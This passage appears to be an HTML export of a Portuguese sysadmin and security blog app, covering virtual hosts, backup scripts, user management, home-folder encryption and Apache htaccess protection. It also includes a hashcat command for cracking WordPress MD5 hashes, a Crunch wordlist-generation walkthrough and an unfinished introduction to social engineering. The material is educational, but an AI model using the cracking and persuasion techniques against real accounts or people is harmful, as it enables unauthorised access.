<div class="uib-header header-bg container-group inner-element uib_w_186" data-uib="layout/header" data-ver="0">
<h2>LINUX</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_187 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_back"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_41_71">
<div class="tarea widget uib_w_188 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_188">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>A criação de<strong> Virtual Hosts</strong> é quase que tarefa necessária na vida dos desenvolvedores e administradores de sistemas, uma vez que sua prática possibilita a hospedagem de vários sites, aplicações e web
services em um só servidor, além de deixar mais amigável o desenvolvimento de diversas aplicações web para quem está programando. Há quem considere essa tarefa massante quando repetida diversas vezes, então há um tempo
decidi focar 30 minutinhos do meu tempo a criar um Script que possibilite a criação e configuração automática desse recurso dentro de ambientes Linux baseados em Debian. Caso sinta necessidade de adaptar o código para o
Slackware, CentOS, Fedora e entre outros, fique a vontade para visitar o repositório e melhorar o código.</p>
<p>Clonando e Instalando o Projeto:</p>
<pre><code> root@pesadelo~#: git clone https://github.com/msfidelis/VHostCreator.git
root@pesadelo~#: cd VHosCreator
root@pesadelo~#: chmod 777 instal-vhostcreator.sh ; ./install-vhostcreator.sh
</code></pre>
<p>
<br>
</p>
<p>Criando o Virtualhost:</p>
<pre><code> root@pesadelo~#: vhost-creator -h <strong>teste.meusite.com</strong> -d <strong>/var/www/html/meusite </strong></code></pre>
</div>
</div>
<div class="widget uib_w_189" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://4.bp.blogspot.com/-uczF4mEQVTg/VoKu118jLXI/AAAAAAAACeU/DZbK86a_UaQ/s1600/Captura%2Bde%2Btela%2Bde%2B2015-12-29%2B14%253A03%253A30.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_190 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_190">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Agora é só acessar a URL que você definiu que o arquivo de hosts do Linux irá te guiar para o diretório do apache selecionado.</p>
</div>
</div>
<div class="widget uib_w_191" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://1.bp.blogspot.com/-mS1dgx-uBMk/VoKvLsFfSeI/AAAAAAAACec/0tWeTQz_vAE/s640/Captura%2Bde%2Btela%2Bde%2B2015-12-29%2B14%253A04%253A30.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Criando_rotin">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_203" data-uib="layout/header" data-ver="0">
<h2>LINUX</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_204 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btnpo_kg"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_43_49">
<div class="tarea widget uib_w_205 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_205">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Neste artigo iremos abordar como criar rotinas de backup manualmente utilizando Shellscript e Crontabs. Neste ambiente simulado estarei efetuado tratando o fileserver com Samba como um storage de produção.
<br>Neste exemplo estaremos realizando o Backup de dois modos: Full e diferencial, no qual estaremos realizando o diferencial todos os dias às 23h00 e o full toda sexta-feita às 18h00
<br>
<br>Considerando o ambiente:</p>
</div>
</div>
<div class="widget uib_w_206" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://2.bp.blogspot.com/-u3wVPh_82nA/VjeRWRhRm6I/AAAAAAAACGI/ZdNlGIpI9KM/s640/fileserve.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_207 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_207">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<ul>
<li>Servidor Linux CentOS 7 ou Debian 8 com Samba</li>
<li>HD de Storage</li>
<li>HD de Backup Full</li>
<li>HD Espelho</li>
</ul>
<p>
<br>
<br>Criando estrutura de pastas
<br>
</p>
<pre><code># mkdir /var/scripts
# mkdir -p /var/log/backups/full/
# mkdir -p /var/log/backups/rsync
</code></pre>
<p>
<br>
</p>
<p>Configurando o Backup Full do Fileserver</p>
<p>Dentro da pasta /var/scripts, crie o arquivo backup-full.sh, de forma que o caminho cru dele seja /var/scripts/backup-full.sh. Dentro do arquivo, altere as variáveis de origem e destino respectivamente para o caminho do storage
e do diretório de backup. Este scripts será responsável por criar um arquivo tar.gz do diretório do storage no HD de backup.
<br>
</p>
<pre><code> # vim /var/scripts/backup-full.sh </code></pre>
<pre><code>
#SCRIPT DE BACKUP FULL REALIZADO DO FILESERVER
#VARIAVEIS
INICIO=`date +%d/%m/%Y-%H:%M:%S`
LOG=/var/log/backups/full/`date +%Y-%m-%d`_log-backup-full.txt
#DEFINA AQUI O DIRETÓRIO QUE SERÁ EFETUADO O BACKUP
<strong> ORIGEM=/mnt/backup-rsync/ </strong>
#DEFINA AQUI O DIRETÓRIO ONDE O ARQUIVO SERÁ GRAVADO JUNTO COM O SEU NOME
<strong>DESTINO=/mnt/backup-full/backup-`date +%Y-%m-%d`.tar.gz </strong>
#CRIA O ARQUIVO DE LOGS
echo " " >> $LOG
echo " " >> $LOG
echo "|-----------------------------------------------" >> $LOG
echo " Backup iniciado em $INICIO" >> $LOG
#CRIA O BACKUP
tar cvf $DESTINO $ORIGEM >> $LOG
FINAL=`date +%d/%m/%Y-%H:%M:%S`
echo " Backup finalizado em $FINAL" >> $LOG
echo "|-----------------------------------------------" >> $LOG
echo " " >> $LOG
echo " " >> $LOG
#FIM DO SCRIPT
</code></pre>
<p>
<br>
<br>
</p>
<p>Configurando o Backup por Rsync</p>
<p>Agora iremos configurar um script que irá fazer um backup via Rsync, ou seja, ele irá pegar todos os arquivos e fazer uma comparação diferencial. Sou seja, ele irá ver o local do backup e o local do storage, pegar só o que
estiver diferente e realizar a cópia.
<br>
<br>Crie o arquivo em /var/scripts/backup-rsync.sh
<br>
</p>
<pre><code> # vim /var/scripts/backup-rsync.sh </code></pre>
<pre><code> #!/bin/bash
#BACKUP CRIADO POR: Matheus Fidelis
#Github - https://github.com/msfidelis/
#Twitter - @fidelisauro
#Blog - http://www.nanoshots.com.br
#SCRIPT DE BACKUP DIFERENCIAL REALIZADO NO FILESERVER
#VARIAVEIS
INICIO=`date +%d/%m/%Y-%H:%M:%S`
LOG=/var/log/backups/full/`date +%Y-%m-%d`_log-backup-rsync.txt
#DEFINA AQUI O DIRETÓRIO QUE SERÁ EFETUADO O BACKUP
<strong>ORIGEM=/mnt/dados/ </strong>
#DEFINA AQUI O DIRETÓRIO ONDE O ARQUIVO SERÁ GRAVADO JUNTO COM O SEU NOME
<strong> DESTINO=/mnt/backup-rsync/ </strong>
#CRIA O ARQUIVO DE LOGS
echo " " >> $LOG
echo " " >> $LOG
echo "|-----------------------------------------------" >> $LOG
echo " Sincronização iniciada em $INICIO" >> $LOG
#CRIA O BACKUP
rsync -Cravzp $ORIGEM $DESTINO >> $LOG
FINAL=`date +%d/%m/%Y-%H:%M:%S`
echo " Sincronização Finalizada em $FINAL" >> $LOG
echo "|-----------------------------------------------" >> $LOG
echo " " >> $LOG
echo " " >> $LOG
#FIM DO SCRIPTS
</code></pre>
<p> </p>
<p> </p>
<p>Criando as Crontabs</p>
<p>Agora vamos editar as crontabs para agendar a execução dos horários de cada script.</p>
<p>Lembrando que o backup full será realizado toda sexta-feira às 18h00 e o diferencial será realizado todos os dias a partir das 23h00</p>
<p> </p>
<p>Como root, digite </p>
<p> </p>
<pre><code> # crontab -e
</code></pre>
<p> </p>
<p>e adicione as linhas
<br>
</p>
<pre><code> # BACKUP DIFERENCIAL POR RSYNC
00 23 * * * /var/scripts/backup-rsync.sh
#BACKUP FULL
00 18 * * 5 /var/scripts/backup-full.sh
</code></pre>
<p>
<br>
<br>
<strong>Testando os scripts e visualizando os logs </strong>
<br>
<br>Execute os dois scripts para ver se vai rodar tudo Ok e criar os logs dentro da pasta /var/logs/backups/full e /var/logs/backups/rsync/
<br>
</p>
<pre><code> # /var/scripts/backup-full.sh
# /var/scripts/backup-rsy.sh
</code></pre>
<p>
<br>
<br>Espere terminar e visualize os logs
<br>
</p>
<pre><code> # cat /var/log/backup/full/2015-**.txt
</code>
</pre>
<h3>Metodo 2 - Instalação via Git</h3>
<p>Criei um repositório com os códigos do Backup e um pequeno instalador para a criação dos Crontabs e da estrutura de pastas
<br>
</p>
<pre><code> # git clone https://github.com/msfidelis/PlanoBackup.git </code></pre>
<pre><code> # cd PlanoBackup/
</code></pre>
<pre><code> # chmod +x setup.sh
</code></pre>
<pre><code> # ./setup.sh
</code></pre>
<p>
<br>
<br>Agora edite os arquivos de configuração do backup e altere a origem e destino dos backups.
<br>
</p>
<pre><code> # vim /var/scripts/backup-full.sh
</code></pre>
<pre><code> # vim /var/scripts/backup-rsync.sh
</code></pre>
<p>
<br>Caso queira alterar os horários dos crontabs</p>
<pre><code> # crontab -e
</code></pre>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Guia_Gerenciamento">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_199" data-uib="layout/header" data-ver="0">
<h2>LINUX</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_200 d-margins btn-primary" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_backoyou"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_44_49">
<div class="tarea widget uib_w_201 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_201">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Os arquivos que contém informações dos usuários e seus respectivos grupos são
<br>
<br>/etc/passwd -> Contém informações dos usuários do sistema
<br>/etc/shadow -> Contém informações dos usuários e senhas criptogradas
<br>/etc/group -> Contém informações dos grupos do sistema
<br>
<br>
</p>
<p>ADICIONANDO USUÁRIOS </p>
<p><strong>Adicionando um usuário de forma simples:</strong>
</p>
<pre><code> # adduser matheus
</code></pre>
<p>
<br>
<strong>Adicionando um usuário especificando a pasta home e shell padrão:</strong>
</p>
<pre><code> # adduser matheus -s /bin/false -d /home/matheus/
</code></pre>
<p>
<br>
<strong>Adicionando um usuário especificando os grupos que o mesmo pertence:</strong>
</p>
<pre><code> # adduser matheus -G root -g ftpgroup
</code></pre>
<p>
<br>
<strong>Adicionando um usuário sem permissão de login:</strong>
</p>
<pre><code> # adduser matheus -s /bin/false -disable-login
</code></pre>
<p>
<br>
<br>
</p>
<p>SENHAS </p>
<p><strong>Trocando a senha do usuário recém criado:</strong>
</p>
<pre><code> # passwd matheus
</code></pre>
<p>
<br>
<strong>Especificando o numero de dias que ele será avisado sobre a expiração e troca da senha:</strong>
</p>
<pre><code> # passwd matheus -w 20
</code></pre>
<p>
<br>
<strong>Especificando o numero de dias que sua senha irá expirar:</strong>
</p>
<pre><code> # passwd matheus -x 30
</code></pre>
<p>
<br>
<strong>Desabilitando um usuário caso a senha tenha expirado:</strong>
</p>
<pre><code> # passwd matheus -i
</code></pre>
<p>
<br>
<br>Unindo as três funções podemos especificar o numero de dias que a senha irá expirar e o numero de dias que ele será notificado para trocar a mesma, se caso ela expire, a conta será desabilitada </p>
<pre><code> # passwd matheus -w 20 -x 30 -i
</code></pre>
<p>
<br>
<br>
<strong>Bloqueia a conta de um usuário:</strong>
</p>
<pre><code> # usermod -L matheus
</code></pre>
<p>
<br>
<strong>Desbloqueia um usuário bloqueado:</strong>
</p>
<pre><code> # usermod -U matheus
</code></pre>
<p>
<br>
<strong>Força a expiração de senha de um usuário forçando o mesmo a trocá-la no próximo login:</strong>
</p>
<pre><code> # usermod -e matheus
</code></pre>
<p>
<br>
<br>
<br>
<br>
</p>
<p>ALTERANDO PERMISSÕES E PARÂMETROS</p>
<p><strong>Alterando o tipo de shell do usuário:</strong>
</p>
<pre><code> # usermod -s /bin/false matheus
</code></pre>
<p>
<br>
<strong>Alterando a home do usuário:</strong>
</p>
<pre><code> # usermod -d /var/www/html/ matheus </code></pre>
<p>
<br>
<strong>Alterando a home do usuário movendo todo o conteúdo da antiga home para a nova:</strong>
</p>
<pre><code> # usermod -d /var/www/html matheus -m
</code></pre>
<p>
<br>
<strong>Altera a data de expiração da senha do usuário no formato de ano--mes--dia:</strong>
</p>
<pre><code> # usermod -e 2015-12-30 matheus
</code></pre>
<p>
<br>
<strong>Altera o nome de login do usuário:</strong>
</p>
<pre><code> # usermod brucewayne -l batman
</code></pre>
<p>
<br>
<strong>Altera o GID (Group ID ) do grupo principal do usuário:</strong>
</p>
<pre><code> # usermod -g 1000 matheus
</code></pre>
<p>
<br>
<strong>Altera o UID (User ID) do usuário:</strong>
</p>
<pre><code> # usermod -u 1000 matheus
</code></pre>
<p>
<br>
<strong>Adiciona o usuário ao grupo do sistema:</strong>
</p>
<pre><code> # adduser matheus root
# usermod -a -G matheus root
</code></pre>
<p>
<br>
</p>
<p>DELETANDO USUÁRIOS</p>
<p><strong>Deletando usuários do sistema:</strong> </p>
<pre><code> # userdel matheus
</code></pre>
<p>
<br>
<strong>Deletando o usuário do sistema junto com seus arquivos na pasta home:</strong> </p>
<pre><code> # userdel -r matheus
</code></pre>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Criptografando_">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_227" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_228 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="ENGERAIASOCIA_"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_41_95">
<div class="tarea widget uib_w_229 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_229">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Neste tutorial estaremos abordando a criptografia de segurança no diretório home de um usuário específico do sistema. Este processo mostra como instalar o EcryptFS e migrar as pastas para diretório criptografados, afim de proteger
a integridade de confidenciabilidade dos dados do usuário de outros usuários do sistema e também de bisbilhoteiros externos que queiram roubar algum tipo de informação sigilosa.
<br>
<br>Lembrando que esta tecnica deverá ser efetuado pelo usuário root, com o usuário em questão DESLOGADO do sistema, ou seja, com nenhuma sessão aberta para o mesmo, pois iremos efetuar uma varredura de cabo a rabo em
todos os arquivos presentes no diretório e executar uma criptografia simétrica em cada um deles, portanto se existirem muitos arquivos e pastas, talvez esse processo demore um pouco para se concluir.
<br>
</p>
<p>Fazendo o Download e Habilitando o do eCryptFS</p>
<p>Primeiro vamos fazer o download o ecrypt-utils:
<br>
<br>
<strong>Debian 7 Wheezy /8 Jessie</strong>
</p>
<pre><code> # apt-get install ecryptfs-utils rsync
</code></pre>
<p>
<br>
<strong>CentOS 7 / RHEL 7</strong>
</p>
<pre><code> # yum install ecryptfs-utils-gui rsync
</code></pre>
<p> </p>
<p>Habilitando o eCryptFS na inicialização do Kernel</p>
<pre><code> # modprobe ecryptfs
</code></pre>
<p> </p>
<p>
<br>Migrando a pasta do Usuário</p>
<p>Agora<strong> deslogue</strong> do seu usuário e logue como Root, se possível reinicie a máquina e em modo texto, digite:</p>
<pre><code> # ecryptfs-migrate-home -u matheus
</code></pre>
<p>
<br>Nesta etapa o sistema irá solicitar a senha do usuário, use a mesma que você utilizou para criar o usuário do sistema. Ele irá passar arquivo por arquivo encriptando as files com a chave que você informou, pode ser um processo
demorado, porém há feedbacks na tela a todo momento.
<br>
<br>Após o termino do processo, basta reiniciar o computador, logar com o seu usuário normal e digite o comando a seguir e informar sua senha novamente para ter seu diretório home criptografado:</p>
<pre><code> # ecryptfs-unwrap-passphrase </code></pre>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="HASH_">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_224" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_225 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="KJL"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_42_32">
<div class="tarea widget uib_w_226 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_226">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Para crackear hashs de senhas em md5 é relativamente simples: Como hashes normalmente não possuem volta, é necessário utilizar seu crack por meio de ataques de colisão, ou seja, por meio de uma força bruta onde iremos ler uma
passlist e para cada linha iremos criptografá-las em md5 e comparar com a hash que queremos identificar e ver se é igual.
<br>
<br>Por sorte o Hashcat possui um módulo muito bacana que já trata as senhas MD5 $Wordpress
<br>
</p>
<pre><code> # hashcat -m 400 /home/matheus/hashes.txt /home/matheus/passlist
</code></pre>
<p>
<br>Onde:
<br>
<br>
<strong>-m 400 </strong>é o modulo do hashcat que trata senhas MD5 Wordpress
<br>
<br>
<strong>/home/matheus/hashes.txt </strong>é o caminho do arquivo que contém minhas hashes
<br>
<br>
<strong>/home/matheus/passlist </strong>é o caminho da passlist utilizada para efetuar o relacionamento por colisão</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Protegendo_dire">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_219" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_220 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="go_back"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_43_25">
<div class="tarea widget uib_w_221 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_221">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Neste pequeno post irei abordar a configuração de um diretório protegido por senha no apache, onde iremos fazer algumas parametrizações no .htaccess do diretório e nas configurações do apache. É bem simples.
<br>
<br>Vamos conhecer mais sobre o ambiente:
<br>
</p>
<ul>
<li>Estarei utilizando apache2 das distribuições Debian, mas o tutorial pode ser adaptado para versões httpd de distribuições Red Hat, Slackware, OpenSUSE e etc. </li>
<li>O diretório a ser protegido será /var/www/html/documentos </li>
<li>A proteção será efetuada através do .htacess</li>
</ul>
<p>Considerando esses pontos, vamos criar um diretório seguro para armazenar os arquivos de senhas do .htacees</p>
<p> </p>
<p>Criando o htpasswd para proteção do diretório:</p>
<p>Vamos criar uma pasta no diretório /home para armazenas os arquivos com as senhas. </p>
<pre><code> # mkdir /home/chaves/
</code></pre>
<p>Agora vamos usar o htpasswd para criar um ficheiro de um usuário com uma senha válida.</p>
<pre><code> htpasswd -c /home/chaves/htpasswd matheus
</code></pre>
<p>
<br>Onde:
</p>
<ul>
<li>/home/chaves/htpasswd : é o caminho para o arquivo de autenticação </li>
<li>matheus : é o usuário válido para o mesmo </li>
</ul>
<p>Agora edite as configurações do Apache:
<br>
<br>
<strong>Debian Distros:</strong>
</p>
<pre><code> # vim /etc/apache2/apache2.conf
</code></pre>
<p>
<br>
<strong>CentOS/RHEL 7:</strong>
</p>
<pre><code> # vim /etc/httpd/conf/httpd.conf
</code></pre>
<p>
<br>E adicione as linhas, alterando as partes que lhe convém:</p>
<pre><code> <Directory /<strong>var/www/html/documentos</strong>>
Options Indexes Includes FollowSymLinks MultiViews
<strong>AllowOverride AuthConfig </strong>
Order allow,deny
Allow from all
</Directory> </code></pre>
</div>
</div>
<div class="widget uib_w_222" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://2.bp.blogspot.com/-VvC-LOOLnJc/Vnl7v-cTYlI/AAAAAAAACbI/PnQBqVRnYZg/s1600/Captura%2Bde%2Btela%2Bde%2B2015-12-22%2B14%253A34%253A50.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_223 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_223">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>Criando/Modificando o arquivo .htaccess</strong>
<br>
<br>Caso não exista, vamos criar o arquivo .htaccess dentro do diretório documentos, no qual queremos proteger.</p>
<pre><code> # vim /var/www/html/documentos/.htaccess
</code></pre>
<p>Dentro dele, vamos pontar nosso arquivo de configurações que acabados de criar.</p>
<pre><code> AuthType Basic
AuthName "Acesso Proibido"
AuthUserFile <strong> /home/chaves/htpasswd </strong>
Require user <strong>matheus </strong>
</code></pre>
<p>
<br>
<br>Agora é só dar reload no apache
<br>
<br>
<strong>Debian Distros:</strong>
</p>
<pre><code> # systemctl reload apache2
</code></pre>
<p>
<br>
<strong>CentOS/RHEL 7:</strong>
</p>
<pre><code> # systemctl reload httpd
</code></pre>
<p>
<br>
<br>
<br>Agora vamos testar nossas configurações :)
<br>
<br>Acesse o diretório pela URL e veja se o formulário de autenticação será exibido. Entre com o usuário e senha que criamos e veja se está tudo Ok.</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="word">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_210" data-uib="layout/header" data-ver="0">
<h2>LINUX</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_211 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_linux"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_44_89">
<div class="tarea widget uib_w_212 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_212">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p> </p>
<p>Uma coisa que tem me incomodado nesse pouco tempo de Blogger e atuante na área de segurança da informação são pessoas que não possuem nem um pouco de força de vontade e ficam mendigando Wordlists. Perdi a conta de quantas vezes
me pediram Wordlists para efetuar Bruteforces e etc.
<br>Não é comum, nem ético compartilhar Wordlists com os demais. Ao meu ver, isso vai além do ato de "compartilhar conhecimento" e passa a ser "passar um arquivo com possíveis senhas que podem ser utilizadas contra as pessoas".
<br>
<br>Bom, matando esse problema, estarei realizando uma demonstração de como gerar suas próprias Wordlists com Crunch.
<br>
<br>A utilização do Crunch é bem simples, o que complica é que determinadas combinações podem gerar wordlists de Petabytes de tamanho.
<br>
<br>Vamos realizar um estudo simples com a sintaxe:
<br>
</p>
<pre><code> # crunch <min> <max> <caracteres>
</code></pre>
<p> </p>
<pre><code> # crunch 5 5 12345
</code></pre>
<p>
<br>
<br>Neste exemplo iremos gerar combinações de mínimo 5 caracteres, máximo 5 caracteres combinados entre os números 12345
<br>
</p>
<p> </p>
<pre><code><code>root@fidelis:/home/matheus# crunch 5 5 12345
Crunch will now generate the following amount of data: 18750 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 3125
11111
11112
11113
11114
11115
11121
11122
...</code></code></pre>
<p> </p>
<p> </p>
<p>
<br>
<br>Agora vamos realizar o mesmo exemplo mandando todo o conteúdo gerado para um arquivo chamado 5pin.txt com a opção -o
<br>
</p>
<pre><code> # crunch 5 5 12345 -o 5pin.txt
</code></pre>
<p> </p>
<p>É Importante entender o tamanho da Wordlist em bytes em grande escala. Se colocarmos todos os caracteres latino americanos no crunch e gerar passwords simples de 8 caracteres.
<br>
</p>
<pre><code> # crunch 8 8 </code>!@#$%abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890</pre>
<p> </p>
<pre> </pre>
<p><code><code>root@fidelis:/home/matheus# crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890</code></code>
</p>
<p><code><code>Crunch will now generate the following amount of data: 1965060950264064 bytes</code></code>
</p>
<p><code><code>1874028158 MB</code></code>
</p>
<p><code><code>1830105 GB</code></code>
</p>
<p><code><code>1787 TB</code></code>
</p>
<p><code><code>1 PB</code></code>
</p>
<p><code><code>Crunch will now generate the following number of lines: 218340105584896 </code></code>
</p>
<p><code><code>aaaaaaaa</code></code>
</p>
<p><code><code>aaaaaaab</code></code>
</p>
<p><code><code>aaaaaaac</code></code>
</p>
<p><code><code>aaaaaaad</code></code>
</p>
<p><code><code>aaaaaaae</code></code>
</p>
<p><code><code>aaaaaaaf</code></code>
</p>
<p><code><code>aaaaaaag</code></code>
</p>
<p>
<br>Note que só com letras e números, sem caracteres especiais e gerando passwords simples de 8 caracteres ocuparíamos 1 PT de memória em disco, fora o processamento.
<br>
<br>Em um outro cenário, vamos supor que você saiba os primeiros 5 caracteres de uma senha de 8.
<br>Podemos repetir o mesmo exemplo classificando as letras que você não quer que mude as colocando em modo estático e deixando ele gerar as combinações com as restantes. Assim diminuindo o tamanho vivo de nossa Wordlist.
<br>
<br>
</p>
<pre><code> # crunch 8 8 </code>abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ -t nanos@@@</pre>
<p> </p>
<pre><code><code>root@fidelis:/home/matheus# crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ -t nanos@@@
Crunch will now generate the following amount of data: 1265472 bytes
1 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 140608
nanosaaa
nanosaab
nanosaac
nanosaad
nanosaae
</code></code></pre>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="uib_page_3">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_247" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_248 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="BTNWOW"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_36_48">
<div class="tarea widget uib_w_249 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_249">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>A engenharia social é conhecida como a técnica de persuadir e ludibriar pessoas com o fim de obtenção de informações privilegiadas cujas são muito utilizadas para extração de login/senhas, dados pessoais, credenciais, entre
outras informações. Sendo explorada tanto em ambiente corporativo ou com vítimas aleatórias que aproveita-se de fraquezas emocionais podendo ser feita fisicamente ou mediante algum meio tecnológico. Abordaremos os
tipos de ataques utilizados na engenharia social, os meios que se utiliza e como entrar a fundo nesse meio.</p>
<p>A identificação de um engenheiro social é muito difícil mediante a vestimenta que o mesmo usa, sendo um bom “ator” e que está moldado sobre simpatia e autoridade em algum fator dominante à ele. Entendendo de uma ângulo
melhor, a exploração da engenharia social vem da fragilidade psicológica do alvo criando ideias sugestivas e indutivas para a vítima, explorando resquícios de personalidade</p>
<h1>Dividimos a engenharia social nos seguintes aspectos</h1>
<h2><strong>Aspecto Pessoal</strong> (<em>exploração através de pessoas</em>)</h2>
<p>Caracterizada por se explorar através de um contato físico, com o fim de arrecadar informações se passando por uma autoridade, representações ou encenações de eventos ocorridos – conhecida também como <strong>engenharia social reversa</strong>.
Aplica-se técnicas que envolve análise comportamental, leitura fria e habilidades relacionadas a programação neurolinguística.</p>
<p>Explora o fator humano através do contato pessoal (ou face-to-face), no qual o engenheiro social obstrui informações através do aspecto psicológico e emocional da vítima seja por um <em>rapport</em> (técnica de forçar
empatia) podendo ser um meio <em><u>verbal</u></em>: que envolve a comunicação por meio de recursos retóricos como a paralinguagem, abstraindo-se a forma de falar, tonalidade da voz, usado para avaliar o aspecto emocional
da vítima, e temos a <em><u>não verbal</u>: </em>que são baseados em comunicações corporais através da análise de gestos e de microexpressões (análise corporal).</p>
<p>O engenheiro social busca em si explorar habilidades relacionadas a “Autoridade”, a qual lhe dá o poder de acesso à lugares restritos dentro de uma corporação, como salas de servidores e escritórios. A técnica pode ser explorada
